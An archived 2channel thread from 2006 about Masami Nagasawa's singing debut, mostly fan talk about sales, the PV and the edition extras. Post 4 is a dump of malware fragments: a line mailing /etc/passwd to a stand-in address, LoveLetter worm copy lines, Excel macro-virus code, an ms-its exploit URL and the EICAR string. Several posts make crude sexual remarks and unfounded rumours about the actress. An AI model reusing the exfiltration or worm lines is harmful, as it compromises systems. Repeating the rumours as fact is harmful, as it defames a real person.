2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

長澤まさみ「セーラー服と機関銃」10月25日デビュー

1 :名無しの歌姫:2006/09/06(水) 06:48:52 ID:7Qh51MqB
「セーラー服と機関銃」の主人公・星泉が歌手デビュー!

女優、薬師丸ひろ子(42)が昭和56年に大ヒットさせた名曲「セーラー服と機関銃」が25年ぶりに復活する。
10月25日に発売される同曲を歌うのは、なんと無名の新人歌手、星泉。実は彼女、10月13日スタートの
TBS系ドラマ「セーラー服と機関銃」(金曜後10・0)の主人公で、劇中でヤクザの組長になってしまう女子高生
だった。その星泉を演じる人物こそ今をときめく…。
http://www.sanspo.com/geino/top/gt200609/gt2006090601.html



2 :名無しの歌姫:2006/09/06(水) 06:53:39 ID:+FHwXq6G
最悪!!絶対買うもんか!!!
エリカの真似すんじゃないわよ!!!

3 :名無しの歌姫:2006/09/06(水) 06:58:27 ID:+FHwXq6G
あーイライラする!!
エリカみたいにヒットするとでも思ってんの??
調子乗るんじゃなくってよ!!!

4 :名無しの歌姫:2006/09/06(水) 07:17:48 ID:U3nO3etM
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

5 :名無しの歌姫:2006/09/06(水) 07:18:56 ID:DnoB4baq
長澤必死だから
許してあげて〜
これコケたら後がないから
許してあげて〜

♪さよならは別れの言葉じゃなくて 再び遭うまでの遠い約束…

6 :名無しの歌姫:2006/09/06(水) 07:36:29 ID:ukXB+Wv7
沢尻みたいに売れちゃうのかな
人気は沢尻より長澤のほうがあるんでしょ?
結局
CD売り上げ  長澤>>沢尻>>>>>>>>>>>>>綾瀬
下手でも売れちゃう。
日本の音楽界もすたれたもんだね。はぁ…

7 :名無しの歌姫:2006/09/06(水) 08:42:44 ID:+lxWaBJa
どこかアイドル臭いんだよなコノ子

8 :名無しの歌姫:2006/09/06(水) 09:07:10 ID:wTQU4pZ2
なんだかなぁ。確かにカワイイけどオーラ無いよな・・・


9 :名無しの歌姫:2006/09/06(水) 10:26:03 ID:Ih30l620
長澤と沢尻は映画女優として両方好きだというファン多いから
DVD付なら沢尻に匹敵するくらいヒットするだろ

10 : ◆JYmPO2Qtfc :2006/09/06(水) 10:32:04 ID:pT5ac7My
長澤まさみはこれからはんぱなく成長する。はず。

11 :名無しの歌姫:2006/09/06(水) 10:32:25 ID:V0qRDT8W
長澤ってちょっと前にCDデビューの話をもらったけど自信がないから、とか言い出して断ったとか話聞いたんだが…

今回だけ、という条件でOKしたのかな?

12 :名無しの歌姫:2006/09/06(水) 13:55:28 ID:6A0+DlXD
予約できるのビクターのサイトだけ?ちなみに何枚くらいあんのかな初回限定版は?

13 :名無しの歌姫:2006/09/06(水) 17:00:41 ID:lGQmgKew
DVD付は無しで発売しろ!
ズルすんな!
声だけで勝負しろよ!

14 :名無しの歌姫:2006/09/06(水) 17:50:28 ID:riVeJYTb
          
        
        
         淡淡淡淡淡淡淡
         淡● 淡淡● 淡 
         淡淡淡蹴淡淡淡
         淡淡淡蹴淡淡淡
         淡淡淡淡淡淡淡    <まさみ かわいいよ まさみ
          淡淡△淡淡
          淡淡淡淡
          蹴蹴     淡
       蹴蹴蹴蹴蹴蹴  淡淡淡
       蹴蹴蹴蹴蹴蹴蹴蹴淡淡淡
     蹴蹴蹴蹴蹴蹴蹴蹴蹴淡淡淡
     蹴蹴蹴蹴蹴蹴蹴蹴蹴蹴淡蹴
     蹴蹴蹴蹴蹴蹴蹴蹴蹴蹴
   蹴蹴蹴蹴蹴蹴淡蹴淡蹴
   蹴蹴蹴蹴
   淡淡淡淡淡
   淡淡淡淡淡   蹴
   淡淡淡淡  蹴蹴
     淡淡淡蹴蹴蹴蹴蹴
        蹴蹴蹴蹴蹴蹴
       蹴蹴蹴蹴蹴蹴蹴
   蹴蹴蹴蹴蹴蹴蹴蹴蹴蹴
   蹴蹴蹴蹴      蹴蹴蹴蹴蹴
   蹴蹴蹴蹴蹴
    蹴蹴蹴
     蹴蹴蹴
       蹴蹴蹴


15 :名無しの歌姫:2006/09/06(水) 19:55:18 ID:6A0+DlXD
フレッツ光を知らないな〜んてぇ〜

16 :名無しの歌姫:2006/09/07(木) 18:28:59 ID:cXYhy8EO
もったいな〜い
フレッツ光を知らないな〜んてぇ〜

17 :名無しの歌姫:2006/09/07(木) 21:18:33 ID:5HncohLs
a

18 :名無しの歌姫:2006/09/09(土) 14:04:53 ID:UXYJfmPk
ほす

19 :名無しの歌姫:2006/09/10(日) 05:25:43 ID:ihDVuX05
何万枚限定なの???

20 :名無しの歌姫:2006/09/10(日) 05:40:38 ID:J/PbvLnl
最初はかわいいと思ったけど、
最近こいつの顔見るとなんかムカツクんだよな。

21 :名無しの歌姫:2006/09/10(日) 06:50:57 ID:KXsZ7VNi
>>20俺も俺も
かわいいけどな・・・
まともに話せないのがな・・・

22 :名無しの歌姫:2006/09/10(日) 13:35:24 ID:05VZoE84
長澤 沢尻にかき消された松浦…
あっちはマジで悲惨な結果になるだろうな

23 :名無しの歌姫:2006/09/10(日) 17:29:21 ID:gueSbU07
長澤と同じ日に大塚愛の新曲が発売される予定だから
売り上げでそれに勝てるかどうか・・・

24 :名無しの歌姫:2006/09/11(月) 21:07:06 ID:i0KiNTsp
hosu

25 :名無しの歌姫:2006/09/12(火) 19:42:58 ID:k9KK8RfK
売れないと思う。

26 :名無しの歌姫:2006/09/13(水) 04:09:14 ID:nyluyXxf
どっかでサンプル聴けないのか?

27 :名無しの歌姫:2006/09/13(水) 04:11:35 ID:jhqPqjN5
所詮肉便器ブサ

28 :名無しの歌姫:2006/09/13(水) 22:31:00 ID:OM6v8oR3
【芸能】綾瀬はるか、長澤まさみ、沢尻エリカ…売れ筋女優のトレンドは奥ゆかしい“隠れ巨乳”[09/12]
http://news18.2ch.net/test/read.cgi/mnewsplus/1158048973/


29 :名無しの歌姫:2006/09/14(木) 01:44:22 ID:Wng4PBUB
>>28
コケてばっかの不良債権の長澤がその面子に入ることがおかしい
会社のゴリ押し

30 :名無しの歌姫:2006/09/14(木) 06:05:06 ID:lSf4NbyH
綾瀬もコケてるよ

31 :名無しの歌姫:2006/09/14(木) 08:37:05 ID:gwS0NPns
長澤は最近、オパーイ大きくなったと思う。

32 :名無しの歌姫:2006/09/14(木) 09:48:27 ID:IOCMMpl/
こいつ全然可愛くないし
フレッツのCM激しくウザイ

33 :名無しの歌姫:2006/09/15(金) 15:28:25 ID:NH78AEk7
曲の話をしろよ

34 :名無しの歌姫:2006/09/15(金) 15:31:22 ID:NjLcqLXJ
やっぱ女に人気ねーなー別にいらないけど

35 :名無しの歌姫:2006/09/15(金) 22:56:10 ID:PTmAZa3V
薬師丸に比べると堕ちるなあ〜〜〜

36 :名無しの歌姫:2006/09/15(金) 22:56:40 ID:PTmAZa3V
↑顔じゃなくてもちろん歌のことな


37 :名無しの歌姫:2006/09/15(金) 22:57:42 ID:rQa3wVfv
さて、いかほどのものか? 
ドラマ次第ですかねぇ〜♪

38 :名無しの歌姫:2006/09/15(金) 23:22:00 ID:675mqDCV
井川に似てきたな

39 :名無しの歌姫:2006/09/15(金) 23:55:44 ID:t0LIW6C/
俺はこいつ好きだな。

40 :名無しの歌姫:2006/09/16(土) 00:09:19 ID:oLuUHMay
はやく聴きたいわけだが

41 :名無しの歌姫:2006/09/16(土) 00:22:03 ID:rsPUdeQg
さっき初CMみた!早く普通に聞きたい

42 :名無しの歌姫:2006/09/18(月) 15:14:34 ID:qgxDHsnc
>>36
歌は勿論の事ルックスに関しても薬師丸以下。
薬師丸に勝ってるのは色の白さだけw


43 :名無しの歌姫:2006/09/18(月) 15:15:30 ID:JShi6F/p
おれはドンピシャ!

44 :名無しの歌姫:2006/09/21(木) 21:50:25 ID:xhZYBX62
>>42
いや、おっぱいでも勝っているぞw

まあ、歌は普通にへただが。

45 :名無しの歌姫:2006/09/22(金) 04:31:28 ID:qyWrKljJ
今の時代、女に嫌われてる奴のCDはたいして売れない
ハロプロ、GIZAの衰退に見られるように
女性アイドルへの偏見も強くなってる


46 :名無しの歌姫:2006/09/23(土) 20:25:28 ID:tFLcA9n+
なんか広末とダブって見える
若いうちは清純派で絶大な人気があるが、年とると微妙な女優になるんだろうな
変な男に、はまったりして

47 :ロンスー ◆F/D.OPy2Wo :2006/09/24(日) 19:29:16 ID:waIgr1Lb
俺は当時薬師丸ひろ子のファンだったので、決まった以上長澤にはできるだけ
崩してほしくない。
崩すのは歌だけにしてくれ。



48 :名無しの歌姫:2006/09/25(月) 10:46:26 ID:xtPormHX
薬師丸さんに歌唱法が近いのは深田恭子
長澤さんの歌唱はフレッツ光CMで明らかになった

49 :名無しの歌姫:2006/09/25(月) 18:48:42 ID:aUsSX5He
早く唄聴きたい

50 :名無しの歌姫:2006/09/25(月) 22:14:03 ID:An5+vUjR
おっさんには売れるだろう。

51 :名無しの歌姫:2006/09/26(火) 23:27:34 ID:W/Y0XUN+
おっさんは懐メロしか買わないよ

52 :名無しの歌姫:2006/09/26(火) 23:59:52 ID:3Unbg0w/
>>45
本当、女って何だよ…。
ヒガミもいいところだぜ。

53 :名無しの歌姫:2006/09/27(水) 00:23:26 ID:e0bM6mp2
もう井川遥にしか見えない

54 :名無しの歌姫:2006/09/27(水) 00:27:00 ID:z0ZpT3IT
初回限定盤に付いてるストラップってどんなの?

55 :ロンスー ◆F/D.OPy2Wo :2006/09/27(水) 00:37:29 ID:lOxg8slq
>>48
俺は今、深田恭子のファンだから言わしてもらうけど、声の高さはぜんぜん違うし、
薬師丸さんは「探偵物語」のような憂いのある歌が一番合ってる。



56 :名無しの歌姫:2006/09/27(水) 00:40:57 ID:t2xrL/Ah
>>55
歌唱法についてですので

57 :名無しの歌姫:2006/09/27(水) 21:56:44 ID:YUxc2eBo
>>52
わざとらしい媚び方とダサい煽り方が嫌われてるのを
嫉妬って決め付けることがおかしい


58 :名無しの歌姫:2006/10/01(日) 11:01:38 ID:BuYrgik9
デモ聴けるようになったね、やっぱいい曲だわ

59 :名無しの歌姫:2006/10/07(土) 10:50:09 ID:RvAaGveE



60 :名無しの歌姫:2006/10/07(土) 14:38:00 ID:1D29zrtQ
エロPVまだー

61 :名無しの歌姫:2006/10/07(土) 16:18:59 ID:/sV1LoRh
http://pro.tok2.com/%7Eohho/cgi-bin/oekaki/bbsnote.cgi

62 :名無しの歌姫:2006/10/07(土) 17:01:23 ID:Dh7HlBrj
この人はこれから過ちもなく、さらに曲に恵まれればミリオンの可能性は十二分にある!

63 :名無しの歌姫:2006/10/08(日) 00:41:04 ID:id4hzbMu
デビューの頃の消防系のポスターたまに見かけるが。。。

変わったなー
と思ふ。

64 :名無しの歌姫:2006/10/08(日) 00:42:36 ID:Q3oETYfS
長澤まさみのセーラー服とおいらのキカン棒

65 :名無しの歌姫:2006/10/08(日) 12:03:29 ID:2X40zUBl
星泉 セーラー服と機関銃
http://upq3new.dtdns.net/img/32719.wmv

ちょっと舌っ足らずだけど、イイ声してるね

66 :名無しの歌姫:2006/10/08(日) 16:15:17 ID:AtMavvmd
♪セーラー服と機関銃
56k
http://meta.yahoo-streaming.jp/webevents/yahoo/music/magazine/rep/20061007/01_56k.asx
300k
http://meta.yahoo-streaming.jp/webevents/yahoo/music/magazine/rep/20061007/01_300k.asx
1M
http://meta.yahoo-streaming.jp/webevents/yahoo/music/magazine/rep/20061007/01_1m.asx


67 :名無しの歌姫:2006/10/08(日) 16:45:01 ID:nMkz8MpD
たまらんです

68 :名無しの歌姫:2006/10/09(月) 01:05:26 ID:1tYQNAmG
>>65
初めて見た時、これPVなのか?と思ってたらヤフーの音楽の所に
説明があって意味がわかった。
結構いいね。もともと余り歌に表情をつけられない女の子向けに
作られた曲だからってのもあるけど、せつなさが出てる。
>>66はさっぱりつながらないw

69 :名無しの歌姫:2006/10/09(月) 03:22:28 ID:4DRLSORX
http://vista.undo.jp/img/vi6013168592.jpg

70 :名無しの歌姫:2006/10/09(月) 22:59:58 ID:4DRLSORX
まさみ丼は歌番組でるのかね?

71 :名無しの歌姫:2006/10/10(火) 21:09:22 ID:9CHfDLQg
650 :名無しさん@お腹いっぱい。:2006/10/08(日) 21:39:13
長澤まさみに大金を注ぎ込むTBS〜怪しい関係を匂わす某一流スポーツ紙

「星泉組長が渋谷で銃乱射?長澤まさみが七日TBS系ドラマ「セーラー服と機関銃」PRのため渋谷繁華街に次々出没した。
すぐに『ドラマの宣伝』だって気付きますよね。それぐらい『銃を構えた長澤の姿がテレビ雑誌書店に溢れている』が、この日ばかりは『そこまでやるか〜』ってぐらい渋谷がカイ、カーンに包まれた。
午前8時長澤がヤクザ風男性を引き連れ109前に現れ、壁に掲出された長澤のポスターをバックに記念撮影。
その後も各種イベントを実行、この日だけで長澤『ドラマの宣伝に3000万円も』費やされた。
他にもCMやインターネットでもコラボ企画が多数、『一つのドラマでこれほど大々的にPR展開するのは異例』だ。
『大PR作戦の成果』は13日に判明する。
TBSと長澤まさみの怪しい関係について考えてみよう

651 :名無しさん@お腹いっぱい。:2006/10/08(日) 21:43:43
ほとんどギャラリーいなかったってマジ?

652 :名無しさん@お腹いっぱい。:2006/10/08(日) 21:46:10
○木まさみ
(*´艸`) ヤバヤバ

654 :名無しさん@お腹いっぱい。:2006/10/08(日) 21:53:05
八木をしっかり股ではさんどけよまさみ。
しばらくは仕事もらえるからな。

655 :名無しさん@お腹いっぱい。:2006/10/08(日) 21:55:48
○木とハメまくってんだろうな

656 :名無しさん@お腹いっぱい。:2006/10/08(日) 22:13:59
>651
役中のセーラー服を着て手下を従え派手に練り歩いた長澤まさみに
街行く人々はまるで無関心
その映像がアッコにおまかせで流れ
人気の無さが露呈した

72 :名無しの歌姫:2006/10/12(木) 12:56:54 ID:iErG4rbi
セーラー服と変なおじさんラの方が売れるかも

73 :名無しの歌姫:2006/10/12(木) 13:34:18 ID:R7TcTEUc
顔ブッサイクやな

74 :名無しの歌姫:2006/10/12(木) 13:58:23 ID:EKhWxrWi
まさみのタンポンティーパックで紅茶飲みたい

75 :名無しの歌姫:2006/10/14(土) 00:23:40 ID:0UpFAsJ7
沢尻さんのと違ってアイドル歌謡になってるから一般受けしないと思う
モーヲタのような人を全員取り込んでのヒットを狙っていそうだ

76 :名無しの歌姫:2006/10/14(土) 04:58:43 ID:tHdC0uDn
整形丸出しの顔にドン引きw

77 :あぼーん:あぼーん
あぼーん

78 :名無しの歌姫:2006/10/14(土) 17:20:31 ID:QBxA2lIk
>>72 売れないって!

79 :名無しの歌姫:2006/10/17(火) 19:33:45 ID:+HqRoCw5
♪♪♪都会は病気ぃ〜ざぁ〜みぃ〜の泡多だしぃさぁ〜

80 :名無しの歌姫:2006/10/18(水) 22:26:44 ID:KPTx24Gw
来週の水曜日発売だね!!

81 :名無しの歌姫:2006/10/18(水) 22:36:49 ID:aENe1yFY
昨日ベストヘアー賞だかで岩手に来てたんだってな。岩手県人なのに今日めざまし見て初めて知ったぜ。

82 :名無しの歌姫:2006/10/18(水) 22:46:32 ID:/9O6pPwp
ベストヘアー賞って岩手でやってるのか。

83 :名無しの歌姫:2006/10/19(木) 19:44:19 ID:oOkSOkNk
初回限定版のDVDとストラップ、どっちが人気ありますか?どっちがレア?

84 :名無しの歌姫:2006/10/19(木) 19:47:08 ID:k6aellSX
ストラップのほうが品薄って聞いたよ。

85 :名無しの歌姫:2006/10/19(木) 19:53:49 ID:UNI6bhZ/
あれまさみ丼がうたってたのか!
薬師丸ひろこかと思ってた

86 :名無しの歌姫:2006/10/19(木) 20:47:30 ID:U91epo2K
>>84
そうなんですか。ありがとうございます。
普通DVDですよね。何でか分かりますか?

87 :名無しの歌姫:2006/10/19(木) 21:08:57 ID:k6aellSX
>>86
DVDは今YAHOO!でやってる女子高生ばっかの地味な映像。
よくわからないけど、ストラップは星泉のフィギアでもついていると期待してる人が多いのかな?
ちなみに自分はDVDの方を予約したけど。

88 :名無しの歌姫:2006/10/19(木) 21:27:46 ID:GIjcx4R+
>>87
そうなんですか。ありがとうございます。

89 :名無しの歌姫:2006/10/19(木) 22:16:41 ID:yVUsoFsn
かわいい!://g004.garon.jp/gdb/GA/0I/HU/fy/rH/o-/0y/XT/eV/6E/2y/EPD.jpg

90 :名無しの歌姫:2006/10/20(金) 06:27:00 ID:/Bwku72O
星泉 Official Site
http://www.hoshiizumi.com/

91 :名無しの歌姫:2006/10/20(金) 07:41:02 ID:RA+TxKVR
長澤まさみセカチューの時よりかなり劣化してしまったな・・

92 :名無しの歌姫:2006/10/20(金) 19:59:00 ID:cSWJjcRQ
どこがいいのか、さっぱり分からない。
これで売れたら日本はおしまいだわ。

93 :名無しの歌姫:2006/10/20(金) 20:33:45 ID:c0TCKni6
>>46
オレも思った!!
顔もそうだし、なんか雰囲気が似てるよね。
オレは結構好きだけど。
広末が女に嫌われてるのは事実だけど、長澤もそうだとは知らんかった。

94 :名無しの歌姫:2006/10/20(金) 20:46:46 ID:TK4lTDgW
また売れるんだろうな…
まあ最近人気出過ぎてるからこいつもそう長くはもたないだろうが

早く週刊誌→引退コースか、今の出過ぎを抑えるかして欲しい

95 :名無しの歌姫:2006/10/20(金) 20:56:43 ID:RA+TxKVR
あのフレッツのCMが流れるとウンザリする
アリコのCM並にウザい
「もったいなーい」ってやつ音外れてるし

96 :持田ヲタあまり調子乗るなよppp:2006/10/21(土) 15:11:53 ID:XPF5vtk5
>>81
ELTの持田の歌い方がキモイ件について
http://music5.2ch.net/test/read.cgi/musicjf/1155181096/826
826 :名無しの歌姫:2006/10/18(水) 00:11:44 ID:aENe1yFY
オラオラオラオラオラオラオラオラオラオラオラオラムダムダムダムダムダムダムダムダムダムダムダムダ

【ファイト】Miyu(長瀬実夕)Part8【応援するよ】
http://music5.2ch.net/test/read.cgi/musicjf/1156787709/969
969 :名無しの歌姫:2006/10/18(水) 22:32:22 ID:aENe1yFY
>>966 顔がデブいのはてめぇだよ!

【関西弁禁止は】愛内里菜 Part.116【辛いねん】
http://music5.2ch.net/test/read.cgi/musicjf/1159098867/871
871 :名無しの歌姫:2006/10/18(水) 22:40:00 ID:aENe1yFY
競馬場って…愛内さん、馬好きなのか?場所がなかっただけ?気になる…

97 :持田ヲタあまり調子乗るなよppp:2006/10/21(土) 15:18:59 ID:XPF5vtk5
>>81
791 :名無しの歌姫:2006/10/14(土) 23:00:44 ID:TFK1Z1oU
ちょわ〜ちょちょちょおwwww〜だお〜じょっじょーじょ
ょっじょっじょっじょっじょっおおおおちょんわ〜ちょちょお
たおたお〜じょじょじょじょじょちょ〜ちょんわ〜じょっじょーじょわ
ちょっちょわっちょわーっ っつおだおじょっじょーじょわっじょっじょっ
じょじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょ
じょじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょ
じょじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょ
じょじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょ
じょじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっおっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょっじょ
おっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっ
おっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっ
おっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっ
おっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっおっ
おっおっおっおっおっおっおっおっおっおっおっおっおっ

98 :名無しの歌姫:2006/10/22(日) 10:31:32 ID:CMx4HFuH
オレ、学園祭でまさみの生歌聴いたことあるんだけど、凄かったよ。マジでジャイアン級。
普通あれだけヘタだとテレちゃうか1番だけでやめるとかになりそうなもんだけど長澤は
最後までニッコニッコしながら楽しそうに歌ってたな・・・。
このマイペースぶりに大物の予感があったよ。

99 :名無しの歌姫:2006/10/22(日) 10:37:38 ID:QGt7rPhk
イインダヨー
下手さ加減を聞くのも
たまにはいい。
続けてればうまくなる


100 :名無しの歌姫:2006/10/22(日) 12:19:12 ID:X9XEC49k
100まさみん

101 :名無しの歌姫:2006/10/22(日) 12:35:42 ID:DQviDB3f
まあ、ただのごり押しだね。

もう少し痩せて背を縮める努力をした方がいい。

102 :名無しの歌姫:2006/10/22(日) 15:33:10 ID:DHfzjqvs
アレンジ結構イイ!

103 :名無しの歌姫:2006/10/22(日) 18:19:36 ID:3b1SYhqM
ストラップ付のほうがDVD付より値段が高いんだね。

104 :名無しの歌姫:2006/10/22(日) 22:07:02 ID:rULd8Qes
可愛いけどな。歌は下手だな!
枕営業かぁ。

事務所の社長と下絡ませなくても、そこそこ売れたのに、

やられ損だなぁ

105 :名無しの歌姫:2006/10/22(日) 22:11:50 ID:rULd8Qes
オリコンの認知度 低かったなぁ

まぁ、初登場12位だろうなあ



106 :名無しの歌姫:2006/10/23(月) 10:14:31 ID:Zv5xb4vm
PVってきり職人が作ったネタだと思ってたけど、マジかよw
他の女子高生ぶっさw

107 :名無しの歌姫:2006/10/23(月) 10:16:22 ID:Zv5xb4vm

客観的に考えると、オリコンの3位以内は当確です、はい

沢尻>まさみ>>>はるか


こんな感じか。堀北は歌やんないのか?

108 :名無しの歌姫:2006/10/23(月) 12:03:15 ID:ALkb+YtP
>>107
てめぇ沢ケツがまさみちゃんより上?何いっちゃってんの?おめえいかれポンチだな?沢ケツはブスだし歌下手だしまぁそれだけなら許せるが沢ケツは調子こきすぎ見え見えなんだよ。だからキモ過ぎ

109 :名無しの歌姫:2006/10/23(月) 18:54:17 ID:+PjqlsyM
3位は不可能だろ
今週は同発が強すぎる

110 :名無しの歌姫:2006/10/24(火) 16:57:38 ID:xKdQQpC0
今買ってきた。PV楽しみにしてたのに‥何コレ?9割ブスな女子高生が映ってるだけじゃん‥orz
オリコン1位とれんじゃねーか?予約ランキングでは1位だったし。といいつつ、木更津も買ってきた俺ガイル‥orz

111 :名無しの歌姫:2006/10/24(火) 17:11:53 ID:SGxWLUHN
まさみたんは(;´Д`)ハァ〜ハァ〜した事あんのかな〜

112 :名無しの歌姫:2006/10/24(火) 19:01:24 ID:+/A5w8kj
最近の劣化でまさみファン辞めた人結構多いね

113 :名無しの歌姫:2006/10/24(火) 20:28:04 ID:I3P+aQ6o
沢尻の初回限定版は今でもオークションで4000円以上の値がついてるけど、 星泉のはそこまでいかないですかね?

114 :名無しの歌姫:2006/10/24(火) 20:45:07 ID:UYasO7zA
歌声だけは個人的に合格!

115 :名無しの歌姫:2006/10/24(火) 20:46:43 ID:Fdo6nN77

今日、初回限定版買った。

最初、モサイ像ついてる方だけ買うつもりだったが、なんとなく内容の知らないDVDついてる方も買っちまった。

DVD見ての感想だが・・・・ロリコンの趣味ある人にはたまらないんだろうけど、個人的にはあまり楽しくなかった orz

やはり俺はロリコンじゃないようだ。

制服モノのAV女優(十八才以上)見てる方が楽しめる。

しかし、モサイ像は気に入っている。


116 :名無しの歌姫:2006/10/24(火) 21:19:22 ID:fsPLg/wT
これ・・・詐欺じゃないの?
PVって長澤まさみ出て無いじゃん。
発売日と初回はDVD付っていうから長澤まさみが見れるならと思って買ったら
ブスグロ女子高生100連発
マジ引いた・・
返品できないの?
明日速攻で売り飛ばしてくるけど・・
こんなダマシ売り逃げ詐欺商売やってるレコード会社も許可した事務所も糞

歌はいいよ。
音痴でも許す。
たどたどしくてもいい。

それよりDVDこんな糞DVD付で650円Upって酷すぎる
いまどきのエロ本についてるDVDでも2時間はあるぞ。
レコード会社氏ね。

ああああああああああああ金の無駄だった。
普通版でよかったじゃねーかよ。

117 :名無しの歌姫:2006/10/24(火) 21:36:31 ID:zLYK6OAI
PVなのに本人が出演していないの?

118 :名無しの歌姫:2006/10/24(火) 21:38:09 ID:Fdo6nN77
最後の方に出てくるのは本人じゃないか?


119 :名無しの歌姫:2006/10/24(火) 21:42:30 ID:CtQq/mnY
ストッラップつきにしとけばよかった

120 :名無しの歌姫:2006/10/24(火) 21:55:16 ID:fsPLg/wT
えっ?あの最後に出てくる人本人なの?
そっくりさんだと思ってた。。

あんな手間隙賭けてブスとグロつれて来てつなぐくらいなら
本人だけを延々と最初から最後まで編集なしで映してくれればいい。
つーか長澤まさみしか見たくないんだよ。

仮に最後に出てくるにしても延々とブスとグロを4分近く我慢して見ろって拷問だよ。
耐えられないし我慢できないし。
このPV作った奴って何がしたかったんだ?
売上の足引っ張ることにしかならないぞ。

手抜くなら、抜くなら抜くで、長澤まさみの顔アップを固定して最初から最後まで表情の変化だけ
写して曲流してくれた方が1万倍ましだぞ。
ブスとグロは耐えられん。

>>113
こんな糞DVD付初回版400円でも売れないと思うよ。

せっかくいい曲歌声なのに・・・
売り方間違えてるって。。

121 :名無しの歌姫:2006/10/24(火) 22:21:58 ID:Z/y3jwyi
俺もDVD付き買って失敗した。大塚愛のだけにしときゃ良かった

122 :名無しの歌姫:2006/10/24(火) 22:35:54 ID:Fdo6nN77
俺はストラップ(モサイ像)ついてるのは満足したがな。

123 :名無しの歌姫:2006/10/24(火) 23:08:25 ID:Ak1O+Ice
長澤まさみ単独PVはドラマDVDにでも収録するんじゃないかな

124 :名無しの歌姫:2006/10/24(火) 23:27:04 ID:HzjE4Dyg

まあ、DVDつきは中高生向けだな、同年代のねーちゃんイパーイ映ってるし。

PV自体の発想は珍しいと思うんだけどね。


何の脈絡も無いが、エビちゃん動画禿しく見たくなってきた。。。


125 :名無しの歌姫:2006/10/25(水) 05:12:21 ID:56YXWuHJ
■2006年間 Single(2005/12/05付〜2006/10/23付迄)

*1 1,036,487 ***,868 Real Face KAT-TUN 2006/03/22
*2 *,755,341 ***,455 粉雪 レミオロメン 2005/11/16 累計848,825
*3 *,673,522 ***,713 青春アミーゴ 修二と彰 2005/11/02 累計1,618,837
*4 *,597,910 ***,742 抱いてセニョリータ 山下智久 2006/05/31
*5 *,564,070 **1,281 SIGNAL KAT-TUN 2006/07/19
*6 *,562,196 ***,*** ただ…逢いたくて EXILE 2005/12/14
*7 *,515,123 **2,424 純恋歌 湘南乃風 2006/03/08
*8 *,485,821 ***,441 supernova/カルマ BUMP OF CHICKEN 2005/11/23
*9 *,450,719 *14,335 タイヨウのうた Kaoru Amane(沢尻エリカ) 2006/08/30
10 *,414,375 ***,825 Dear WOMAN SMAP 2006/04/19

126 :名無しの歌姫:2006/10/25(水) 07:46:28 ID:/lLBhGMJ
さっきPV見てみたけどさ…感想はイマイチ…
この曲に合ってない…ホントにプロが作ったんでしょうか?
夢のために恋人と別れて都会へ行くっていうような歌詞なんだからさ…
いい曲なのに…このPVじゃあコントみたいになってる…セーラー服をなんでそんなに
おしていくんだろう…そこじゃないでしょ…
いや〜それにしても来生たかおさんの曲はいいね〜歌詞がいい…


127 :名無しの歌姫:2006/10/25(水) 09:38:08 ID:E29Fk6iI
PVの女子高生
長澤を引き立てるために
わざとブサイ女使ってるよな

128 :名無しの歌姫:2006/10/25(水) 13:13:44 ID:3A2yiVQQ
長澤の歌は結構イイのに
何だよこのPV ('A`)

129 :名無しの歌姫:2006/10/25(水) 14:50:10 ID:0skU7Qql
DVD付きのやつ、いくらで買い取ってくれるかな?

130 :名無しの歌姫:2006/10/25(水) 15:03:09 ID:2cVKaGU8
>>129
ヒント:ヤフオク

131 :名無しの歌姫:2006/10/25(水) 15:12:40 ID:N3acWaf7
沢尻と違ってヤフオクでも全く売れてない・・・



132 :名無しの歌姫:2006/10/25(水) 17:19:55 ID:mi08NS5o
100円で買うから出品してよ

133 :名無しの歌姫:2006/10/25(水) 17:55:42 ID:yBA8Iwa9
http://newsplus.jugem.jp/
